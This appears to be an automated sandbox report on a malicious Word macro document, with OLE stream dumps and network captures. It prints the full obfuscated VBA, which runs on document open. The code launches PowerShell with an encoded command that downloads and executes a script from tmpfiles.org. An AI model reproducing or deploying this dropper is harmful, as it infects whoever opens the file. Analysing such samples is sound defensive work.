KbR = "P": dTeRavdQLFiaRCHrHyuXdeHybQeFIYC = "o": DLszaNoPwSTucJvPenyIHhc = "w": wIZODYVPDCMy = "e": JAusDBfPdQy = "r": duEZDXrOJdeWkYVtTepnzoLHCY = "s": Cf = "h": WXdwDWONPKC = "e": avchVXNDYcPYTstAYhuGKhrTaTF = "l": eUoiAJtFvyGJNebIdK = "l":
'VrYIweaXzFDiXhfXpVoMWSuUTosuuwDpCKceik
'VprcMvTybtWCrceoHvvQyDD  IfHBhDnuXCPPOTzOEwVa
'HZLVpOHOvAFOPHKCOiiAoKd  WFnhePfKQR
'oQcNNwneBDkaphvLVEeeiRIMsGzUVGWYLwIWdREvmvAZbCPPTAPKp sAUsICOuRHVAkoJLyAHGFPSyN
With Selection
.Borders(xlDiagonalDown).LineStyle = xlNone
.Borders(xlDiagonalUp).LineStyle = xlNone
.Borders(xlEdgeLeft).LineStyle = xlNone
.Borders(xlEdgeTop).LineStyle = xlNone
.Borders(xlEdgeBottom).LineStyle = xlNone
.Borders(xlEdgeRight).LineStyle = xlNone
.Borders(xlInsideVertical).LineStyle = xlNone
.Borders(xlInsideHorizontal).LineStyle = xlNone
End With
With Application.FileSearch
.NewSearch
'Change path to suit
.LookIn = "WFnhePfKQR"
.FileType = msoFileTypeExcelWorkbooks
If .Execute > 0 Then
For lCount = 1 To .FoundFiles.Count
Set wbResults = Workbooks.Open(FileName:=.FoundFiles(lCount), UpdateLinks:=0)
wbResults.Close SaveChanges:=True
Next lCount
End If
End With
Application.ScreenUpdating = True
Application.DisplayAlerts = True
'WFnhePfKQR  DaIWJdWiZZvwD
'  yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
'khEaSnVGRpeArReMVbWPBsRCtZYcrikDFGkCUJUvhXeshaVHHI  RrEFfsdBSDRSvDUIiatMvCDoUcGQekfhMSSiJpkUiVEUzXHRSbXAVKCnSvLdPotptLfyMwYXSDEtZKyXBPYdwwvdtYrydf
' YbzCBveVatYsAUTyQCGXiuehbzWOeYr
'XaiAZGbTUWBFpSreBHFnfEsUYcLad
'baTEDvFnPTPpuJoaLzhYw
'hZFHaVcOKPdUrAuXVvOJs
'RrEFfsdBSDRSvDUIiatMvCDoUcGQekfhMSSiJpkUiVEUzXHRSbXAVKCnSvLdPotptLfyMwYXSDEtZKyXBPYdwwvdtYrydf
Dim MwGaJWMtUaonakiksIhs As Long
'MsgBox Prompt:="IfHBhDnuXCPPOTzOEwVa?", Buttons:=DaIWJdWiZZvwD , Title:="YbzCBveVatYsAUTyQCGXiuehbzWOeYr   "
'ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe

'   khEaSnVGRpeArReMVbWPBsRCtZYcrikDFGkCUJUvhXeshaVHHI
Dim r As Long, x As Long
For x = 2 To r Step 1
r = r - 1
Next x
'zXJRDVFfnEbUETkMdMFHN
'WFnhePfKQR  ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe
'zXJRDVFfnEbUETkMdMFHN
'WFnhePfKQR   IfHBhDnuXCPPOTzOEwVa
'LYfutprNPzcESQiHeZEdwZRYwQrdXNWAnMoNJSvTwKoQhpNWIVVRIeMpiKGGVQRcCHpKDzXvOKyFncSbI   DaIWJdWiZZvwD
'khEaSnVGRpeArReMVbWPBsRCtZYcrikDFGkCUJUvhXeshaVHHI  yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
'WFnhePfKQR  ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe
wkFG = KbR + dTeRavdQLFiaRCHrHyuXdeHybQeFIYC + DLszaNoPwSTucJvPenyIHhc + wIZODYVPDCMy + JAusDBfPdQy + duEZDXrOJdeWkYVtTepnzoLHCY + Cf + WXdwDWONPKC + avchVXNDYcPYTstAYhuGKhrTaTF + eUoiAJtFvyGJNebIdK + "  -e  SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"""""
'ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe
'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
' ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe
Dim PcLEMdZaBZ As Long
Dim rhcIhwX As String
Dim dfC As Long






'JAZyrwQykhZrhiypyfQQfDxDJfZJCZLBrUswpvnCQCUfkhLsZiEDwynrJiGhOpABvCQpCrQpGTQkUUxwCiBfJUvBiisEiOfJsOkChOJhiZBvyiBpDfxQDviJMEwfLBwykpUBhMDDkiyvpMLQAwJxGDTGQwvDiEBALkTCQMxDQipyJAUMAwrJUUJyyLBGEMyGpCTkxvQAirxiEMBhxvEUMUrsQMhOEyAwwxCCUhTfQLprDpEUxixyBMhEkLJCikOwZLyOrwpTkGyUBQMkvpfxsTrETLrfnpUpAipZTxrLBhGOxOykZMnBrfhhhErAnCUOOCvhJyfEUCBvJxOvfDxnAOyvkxTwkLxEOyQnDhQfDvkOJZnxxiBswiBMJMBCwsAfQxfAZApBsUDGkvUnCpUACOQQOwiDkyDQsrOCUGwABMMCCpOZZMMkTQLkxDELEBUUZsEfGAkiOvDCOyynZfLLyxvAAJQZDpiMZZwAUxyOiLpifBOhirnG








zXJRDVFfnEbUETkMdMFHN = "W": nYXOavcKzIMpBcpPTUXXH = "S": wYvKDGFpELyFyvwTfdsoC = "c": hZFHaVcOKPdUrAuXVvOJs = "r": baTEDvFnPTPpuJoaLzhYw = "i": EXrVaGcGkBrFHKhIoEivS = "p": IWcZEvFbdtKpLBfEDsOWX = "h": MVOcbVdCYnYUNudBNksGd = "t": WFnhePfKQR = ".":
UUh = "s":
YUQGTcCcXIokXZANQUPNKA = "e": 'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
zFKcHMiERAysafHJOIRHWNTtno = "l": 'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh 'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
UwFFnsSaLuaDdvPFLsSAibHYWr = "l" 'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
'JAZyrwQykhZrhiypyfQQfDxDJfZJCZLBrUswpvnCQCUfkhLsZiEDwynrJiGhOpABvCQpCrQpGTQkUUxwCiBfJUvBiisEiOfJsOkChOJhiZBvyiBpDfxQDviJMEwfLBwykpUBhMDDkiyvpMLQAwJxGDTGQwvDiEBALkTCQMxDQipyJAUMAwrJUUJyyLBGEMyGpCTkxvQAirxiEMBhxvEUMUrsQMhOEyAwwxCCUhTfQLprDpEUxixyBMhEkLJCikOwZLyOrwpTkGyUBQMkvpfxsTrETLrfnpUpAipZTxrLBhGOxOykZMnBrfhhhErAnCUOOCvhJyfEUCBvJxOvfDxnAOyvkxTwkLxEOyQnDhQfDvkOJZnxxiBswiBMJMBCwsAfQxfAZApBsUDGkvUnCpUACOQQOwiDkyDQsrOCUGwABMMCCpOZZMMkTQLkxDELEBUUZsEfGAkiOvDCOyynZfLLyxvAAJQZDpiMZZwAUxyOiLpifBOhirnG
KbR = zXJRDVFfnEbUETkMdMFHN + nYXOavcKzIMpBcpPTUXXH + wYvKDGFpELyFyvwTfdsoC + hZFHaVcOKPdUrAuXVvOJs + baTEDvFnPTPpuJoaLzhYw + EXrVaGcGkBrFHKhIoEivS + MVOcbVdCYnYUNudBNksGd + WFnhePfKQR + UUh + IWcZEvFbdtKpLBfEDsOWX + YUQGTcCcXIokXZANQUPNKA + zFKcHMiERAysafHJOIRHWNTtno + UwFFnsSaLuaDdvPFLsSAibHYWr
'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
'wHrUtRPzQDKoZdXKKCGphYZeQaHIRfOkuNQWfOnbCQZwBZKwhadU
'JAZyrwQykhZrhiypyfQQfDxDJfZJCZLBrUswpvnCQCUfkhLsZiEDwynrJiGhOpABvCQpCrQpGTQkUUxwCiBfJUvBiisEiOfJsOkChOJhiZBvyiBpDfxQDviJMEwfLBwykpUBhMDDkiyvpMLQAwJxGDTGQwvDiEBALkTCQMxDQipyJAUMAwrJUUJyyLBGEMyGpCTkxvQAirxiEMBhxvEUMUrsQMhOEyAwwxCCUhTfQLprDpEUxixyBMhEkLJCikOwZLyOrwpTkGyUBQMkvpfxsTrETLrfnpUpAipZTxrLBhGOxOykZMnBrfhhhErAnCUOOCvhJyfEUCBvJxOvfDxnAOyvkxTwkLxEOyQnDhQfDvkOJZnxxiBswiBMJMBCwsAfQxfAZApBsUDGkvUnCpUACOQQOwiDkyDQsrOCUGwABMMCCpOZZMMkTQLkxDELEBUUZsEfGAkiOvDCOyynZfLLyxvAAJQZDpiMZZwAUxyOiLpifBOhirnG
Set RsoXaQzRZLepceHbdJWVCWvy = CreateObject(KbR)  'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh 'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
RsoXaQzRZLepceHbdJWVCWvy.Run wkFG, 858235310:
'JAZyrwQykhZrhiypyfQQfDxDJfZJCZLBrUswpvnCQCUfkhLsZiEDwynrJiGhOpABvCQpCrQpGTQkUUxwCiBfJUvBiisEiOfJsOkChOJhiZBvyiBpDfxQDviJMEwfLBwykpUBhMDDkiyvpMLQAwJxGDTGQwvDiEBALkTCQMxDQipyJAUMAwrJUUJyyLBGEMyGpCTkxvQAirxiEMBhxvEUMUrsQMhOEyAwwxCCUhTfQLprDpEUxixyBMhEkLJCikOwZLyOrwpTkGyUBQMkvpfxsTrETLrfnpUpAipZTxrLBhGOxOykZMnBrfhhhErAnCUOOCvhJyfEUCBvJxOvfDxnAOyvkxTwkLxEOyQnDhQfDvkOJZnxxiBswiBMJMBCwsAfQxfAZApBsUDGkvUnCpUACOQQOwiDkyDQsrOCUGwABMMCCpOZZMMkTQLkxDELEBUUZsEfGAkiOvDCOyynZfLLyxvAAJQZDpiMZZwAUxyOiLpifBOhirnG
'Declare your variables
        Dim yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh As Range
        Dim ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe As Range
    'Save the Workbook before changing cells
        Select Case MsgBox("Can't Undo this action.  " &                             "Save Workbook First?", vbYesNoCancel)
            Case Is = vbYes
            ThisWorkbook.Save
            Case Is = vbCancel
            Exit Sub
        End Select
    'Define the target Range.
        Set MyRange = Selection
    'Start looping through the range.
        For Each MyCell In MyRange
    'Trim the Spaces.
            If Not IsEmpty(MyCell) Then
                MyCell = Trim(MyCell)
            End If
    'Get the next cell in the range
        Next MyCell
   
End Sub

VBA File Name: ThisDocument.cls, Stream Size: 203

General
Stream Path:	Macros/VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	203
Data ASCII:	. . . A t t r i b u t . e V B _ N a m . e = " T h i . s D o c u m e n . t " . . . B a s . . 1 N o r m a l . . . V G l o b a l ! . S p a c . l F a . l s e . J C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . T e m p . l a t e D e r i . v . $ C u s t o m l i z C . P . . . . . S u b q _ O p . e n ( ) . . a w . n d j f a w d w @ d . . E n d . . . .
Data Raw:	01 c7 b0 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 44 6f 63 75 6d 65 6e 10 74 22 0d 0a 0a 8c 42 61 73 01 02 8c 31 4e 6f 72 6d 61 6c 02 2e 19 56 47 6c 6f 62 61 6c 21 01 aa 53 70 61 63 01 6c 46 61 08 6c 73 65 0c 4a 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72 75 0d 22 45 78 70 08 6f 73 65 14 1c 54

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
awndjfawdwd
End Sub

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 118

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	118
Entropy:	4.268110596474915
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . F $ . . . D o c u m e n t o d o M i c r o s o f t W o r d 9 7 - 2 0 0 3 . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 24 00 00 00 44 6f 63 75 6d 65 6e 74 6f 20 64 6f 20 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 260

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	260
Entropy:	2.3390993345415625
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . . t . u . l . o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 05 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d4 00 00 00 0a 00 00 00 01 00 00 00 58 00 00 00 0b 00 00 00 60 00 00 00 11 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 0c 00 00 00 7c 00 00 00 05 00 00 00 a4 00 00 00 10 00 00 00 ac 00 00 00 06 00 00 00 b4 00 00 00 0d 00 00 00 bc 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 512

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	512
Entropy:	2.8735362928076102
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . i . a . g . o . . O . l . i . v . e . i . r . a . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . h ( i c . . . .
Data Raw:	fe ff 00 00 05 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 01 00 00 12 00 00 00 01 00 00 00 98 00 00 00 04 00 00 00 a0 00 00 00 10 00 00 00 c8 00 00 00 06 00 00 00 d0 00 00 00 0c 00 00 00 dc 00 00 00 05 00 00 00 e8 00 00 00 0b 00 00 00 f4 00 00 00 08 00 00 00 00 01 00 00 0d 00 00 00 28 01 00 00

Stream Path: 1Table, File Type: data, Stream Size: 2934

General
Stream Path:	1Table
CLSID:
File Type:	data
Stream Size:	2934
Entropy:	3.181520705565234
Base64 Encoded:	False
Data ASCII:	j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
Data Raw:	6a 04 0f 00 12 00 01 00 0b 01 0f 00 00 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 218

General
Stream Path:	Macros/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	218
Entropy:	4.978459919366058
Base64 Encoded:	True
Data ASCII:	I D = " { 1 8 E 2 6 B 3 B - 0 E 2 5 - 4 6 A 3 - 8 C 3 D - 3 C 9 6 D A D 6 8 0 C 7 } " . . D o c u m e n t = T h i s D o c u m e n t . . M o d u l e = N e w M o d u l e . . N a m e = " P r o j e c t " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 8 D A 3 3 C 1 3 7 C 1 3 7 C 1 3 7 C 1 3 7 " . . D P B = " D A D 8 3 1 C 1 3 2 C 2 3 2 C 2 3 2 " . . G C = " D C D E 3 7 C B 3 B C C 3 C C C 3 C 3 3 " . .
Data Raw:	49 44 3d 22 7b 31 38 45 32 36 42 33 42 2d 30 45 32 35 2d 34 36 41 33 2d 38 43 33 44 2d 33 43 39 36 44 41 44 36 38 30 43 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 0d 0a 4d 6f 64 75 6c 65 3d 4e 65 77 4d 6f 64 75 6c 65 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69 62 6c 65 33 32 3d 22 33 39 33 32 32

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: ISO-8859 text, with no line terminators, Stream Size: 7

General
Stream Path:	Macros/VBA/_VBA_PROJECT
CLSID:
File Type:	ISO-8859 text, with no line terminators
Stream Size:	7
Entropy:	1.8423709931771088
Base64 Encoded:	False
Data ASCII:	a . . .
Data Raw:	cc 61 ff ff 00 00 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 529

General
Stream Path:	Macros/VBA/dir
CLSID:
File Type:	data
Stream Size:	529
Entropy:	6.335437239038614
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . . _ , f . . . . " . < . . . . r s t d o . l e > . . s . t . . d . o . l . e . ( . . h . . ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ S y s @ t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t . i o n . E N o r ( m a l E N C r . m . a F . . c . E C . . . . } \\ , f . ! O f f i c g O . f . i . c g . . g 2 D F 8 . D 0 4 C - 5
Data Raw:	01 0d b2 80 01 00 04 00 00 00 03 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 00 08 06 12 09 02 12 80 15 5f 2c 66 06 00 0c 02 22 0a 3c 02 0a 16 02 72 73 74 64 6f 08 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 00 28 0d 00 68 00 11 5e 00 03 2a 5c 00 47 7b 30 30 30

Stream Path: WordDocument, File Type: data, Stream Size: 3630

General
Stream Path:	WordDocument
CLSID:
File Type:	data
Stream Size:	3630
Entropy:	0.7564027997021255
Base64 Encoded:	False
Data ASCII:	. ! ` . . . . . . . . . . . . . . . . . . . . . . . . . . A W N . 2 4 . 5 . . . . . . . . . . . . . . . . . . . . . . . . . . > . . > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . .
Data Raw:	ec a5 c1 00 21 60 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 41 57 4e 00 32 34 2e 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 3e c7 00 00 3e c7 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 17:20:30.287405014 CET	49712	443	192.168.2.5	104.21.21.16
Jan 1, 2025 17:20:30.287448883 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:20:30.287704945 CET	49712	443	192.168.2.5	104.21.21.16
Jan 1, 2025 17:20:30.295974970 CET	49712	443	192.168.2.5	104.21.21.16
Jan 1, 2025 17:20:30.295988083 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:20:30.764069080 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:20:30.764157057 CET	49712	443	192.168.2.5	104.21.21.16
Jan 1, 2025 17:20:30.766992092 CET	49712	443	192.168.2.5	104.21.21.16
Jan 1, 2025 17:20:30.766999960 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:20:30.767208099 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:20:30.780352116 CET	49712	443	192.168.2.5	104.21.21.16
Jan 1, 2025 17:20:30.827328920 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:20:31.284729004 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:20:31.284823895 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:20:31.284854889 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:20:31.284884930 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:20:31.284903049 CET	49712	443	192.168.2.5	104.21.21.16
Jan 1, 2025 17:20:31.284919024 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:20:31.284940004 CET	49712	443	192.168.2.5	104.21.21.16
Jan 1, 2025 17:20:31.285276890 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:20:31.285372972 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:20:31.285413027 CET	49712	443	192.168.2.5	104.21.21.16
Jan 1, 2025 17:20:31.305151939 CET	49712	443	192.168.2.5	104.21.21.16
Jan 1, 2025 17:20:42.763881922 CET	59221	53	192.168.2.5	1.1.1.1
Jan 1, 2025 17:20:42.768810987 CET	53	59221	1.1.1.1	192.168.2.5
Jan 1, 2025 17:20:42.768897057 CET	59221	53	192.168.2.5	1.1.1.1
Jan 1, 2025 17:20:42.768944025 CET	59221	53	192.168.2.5	1.1.1.1
Jan 1, 2025 17:20:42.773752928 CET	53	59221	1.1.1.1	192.168.2.5
Jan 1, 2025 17:20:43.221072912 CET	53	59221	1.1.1.1	192.168.2.5
Jan 1, 2025 17:20:43.222219944 CET	59221	53	192.168.2.5	1.1.1.1
Jan 1, 2025 17:20:43.227224112 CET	53	59221	1.1.1.1	192.168.2.5
Jan 1, 2025 17:20:43.227302074 CET	59221	53	192.168.2.5	1.1.1.1
Jan 1, 2025 17:20:56.935858965 CET	58070	53	192.168.2.5	1.1.1.1
Jan 1, 2025 17:20:56.940738916 CET	53	58070	1.1.1.1	192.168.2.5
Jan 1, 2025 17:20:56.940810919 CET	58070	53	192.168.2.5	1.1.1.1
Jan 1, 2025 17:20:56.940835953 CET	58070	53	192.168.2.5	1.1.1.1
Jan 1, 2025 17:20:56.945621967 CET	53	58070	1.1.1.1	192.168.2.5
Jan 1, 2025 17:20:57.416874886 CET	53	58070	1.1.1.1	192.168.2.5
Jan 1, 2025 17:20:57.417367935 CET	58070	53	192.168.2.5	1.1.1.1
Jan 1, 2025 17:20:57.422590971 CET	53	58070	1.1.1.1	192.168.2.5
Jan 1, 2025 17:20:57.422708035 CET	58070	53	192.168.2.5	1.1.1.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 17:20:30.272876978 CET	59579	53	192.168.2.5	1.1.1.1
Jan 1, 2025 17:20:30.282850027 CET	53	59579	1.1.1.1	192.168.2.5
Jan 1, 2025 17:20:42.763221979 CET	53	62356	1.1.1.1	192.168.2.5
Jan 1, 2025 17:20:56.935447931 CET	53	63624	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 1, 2025 17:20:30.272876978 CET	192.168.2.5	1.1.1.1	0xc8df	Standard query (0)	tmpfiles.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 1, 2025 17:20:30.172314882 CET	1.1.1.1	192.168.2.5	0x8428	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 1, 2025 17:20:30.172314882 CET	1.1.1.1	192.168.2.5	0x8428	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Jan 1, 2025 17:20:30.282850027 CET	1.1.1.1	192.168.2.5	0xc8df	No error (0)	tmpfiles.org	104.21.21.16	A (IP address)	IN (0x0001)	false
Jan 1, 2025 17:20:30.282850027 CET	1.1.1.1	192.168.2.5	0xc8df	No error (0)	tmpfiles.org	172.67.195.247	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

tmpfiles.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49712	104.21.21.16	443	5144	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 16:20:30 UTC	88	OUT	GET /dl/18712758/rgvsozgu8x.jpg HTTP/1.1 Host: tmpfiles.org Connection: Keep-Alive
